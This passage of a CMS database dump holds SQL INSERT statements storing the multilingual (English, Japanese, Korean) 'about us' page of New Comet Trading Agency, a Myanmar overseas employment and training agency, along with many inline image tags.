src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 228, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" data-align=\"center\">', '', 'full_html'),
('page', 0, 23, 228, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。<o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 228, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span 